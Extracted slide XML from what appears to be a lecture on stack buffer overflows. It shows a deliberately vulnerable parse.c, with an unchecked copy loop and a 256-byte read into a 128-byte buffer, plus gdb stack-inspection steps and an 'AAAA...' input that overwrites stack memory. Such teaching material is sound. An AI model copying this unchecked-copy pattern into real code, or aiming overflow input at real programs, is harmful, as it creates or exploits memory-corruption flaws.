            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2830909" y="4169374"/>
              <a:ext cx="8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2345" y="3817098"/>
              <a:ext cx="4154582" cy="248622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2090" y="4020935"/>
              <a:ext cx="3861083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We can debug using </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>parse</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>Then we can take a look at the stack.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>break 7</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>	(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>run</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>	(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>x/64x $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0" smtClean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043" y="3743097"/>
              <a:ext cx="86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Debug:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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4967759" y="6152227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23: /** main to load a file and run parse */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67702" y="1160312"/>
            <a:ext cx="3433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Our example modified to include a main function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97366" y="1850228"/>
            <a:ext cx="87107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/>
              <a:t>parse.c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4548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13044" y="1834550"/>
            <a:ext cx="4201615" cy="7526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25400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3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Viewing Stack Frame with GDB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0" y="965145"/>
            <a:ext cx="21557" cy="56419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30909" y="2209386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32345" y="1857110"/>
            <a:ext cx="4154582" cy="7143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42090" y="2060947"/>
            <a:ext cx="3861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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) x/64x $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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121043" y="1783109"/>
            <a:ext cx="86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Debug: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267702" y="1160312"/>
            <a:ext cx="3433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Our running example modified to illustrate multiple stack frames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97366" y="1850228"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="screenshot_safe_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54" y="2567272"/>
            <a:ext cx="8830005" cy="429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8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6376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What are buffer overflows?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51478"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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669001"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5885222" y="819704"/>
          <a:ext cx="1435608" cy="406974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560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args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ret address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frame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ptr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  <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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  <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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local variables</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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  <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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  <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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  <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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callee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 saved registers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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83929" y="4582456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4310572"/>
            <a:ext cx="87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203810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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422162"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5880842" y="815304"/>
          <a:ext cx="1435608" cy="99994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560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2" name="Right Arrow 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83929" y="2837583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0" y="2565699"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Right Arrow 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83929" y="1409052"/>
            <a:ext cx="474836" cy="28459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0" y="1131638"/>
            <a:ext cx="877276" cy="40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34586" y="44217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773192"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5885250" y="4629921"/>
          <a:ext cx="1432247" cy="261593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2247"/>
              </a:tblGrid>
              <a:tr h="56012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args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ret</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0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 address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frame</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0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lang="en-US" sz="1100" b="1" baseline="0" dirty="0" err="1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ptr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local variables</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty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callee</a:t>
                      </a:r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 saved registers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3" name="TextBox 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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586218" y="1826843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80" name="Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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599868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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7367292" y="17451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7365019" y="2011487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7365018" y="229642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7368613" y="27477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7366341" y="292459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7366339" y="311184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7364066" y="3288671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7366339" y="376104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7366339" y="394225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7366339" y="4129503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>
            <a:off x="7366339" y="43004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4719899" y="1839880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709486" y="2146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4166433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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192726"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20dc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0xbf02224c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0x00000000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0x41414141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0x20544547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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4715524" y="1568922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0xbffff760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7364236" y="2586574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7639855" y="4914254"/>
            <a:ext cx="325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in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7628874" y="5245626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101" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5578051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H="1">
            <a:off x="7409948" y="51011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7407675" y="54302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7407674" y="576225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7639733" y="5887249"/>
            <a:ext cx="228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i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H="1">
            <a:off x="7418975" y="607145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7" name="Table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597505"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000000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8" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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109" name="Straight Arrow Connector 108"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7389894" y="481453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4731200" y="4657865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0xbffff6b4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720787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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7474" y="6211669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copy_lower’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frame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8022584" y="782022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parse’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frame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431215" y="1128953"/>
            <a:ext cx="517363" cy="439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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7399859" y="6319003"/>
            <a:ext cx="407615" cy="215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9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62" grpId="0" animBg="1"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="70" grpId="0" animBg="1"/>
      <p:bldP spid="72" grpId="0"/>
      <p:bldP spid="73" grpId="0"/>
      <p:bldP spid="75" grpId="0"/>
      <p:bldP spid="79" grpId="0"/>
      <p:bldP spid="80" grpId="0"/>
      <p:bldP spid="81" grpId="0"/>
      <p:bldP spid="93" grpId="0"/>
      <p:bldP spid="94" grpId="0"/>
      <p:bldP spid="95" grpId="0"/>
      <p:bldP spid="97" grpId="0"/>
      <p:bldP spid="99" grpId="0"/>
      <p:bldP spid="100" grpId="0"/>
      <p:bldP spid="101" grpId="0"/>
      <p:bldP spid="105" grpId="0"/>
      <p:bldP spid="108" grpId="0"/>
      <p:bldP spid="110" grpId="0"/>
      <p:bldP spid="111" grpId="0"/>
      <p:bldP spid="112" grpId="0"/>
      <p:bldP spid="113" grpId="0"/>
      <p:bldP spid="114" grpId="0"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="1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9144000" cy="63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34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6376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What are buffer overflows?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757455"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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860293"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20dc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0xbf0222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0x00000000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0x414141</a:t>
                      </a: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41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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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464280"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000000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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2963016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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET A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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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7364236" y="2586574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828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6376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What are buffer overflows?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706988"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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17194"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20dc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0xbf02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0x00000000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0x4141</a:t>
                      </a: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4141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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584795"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2963016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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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7364236" y="2586574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504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6376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What are buffer overflows?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245701"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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984054"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
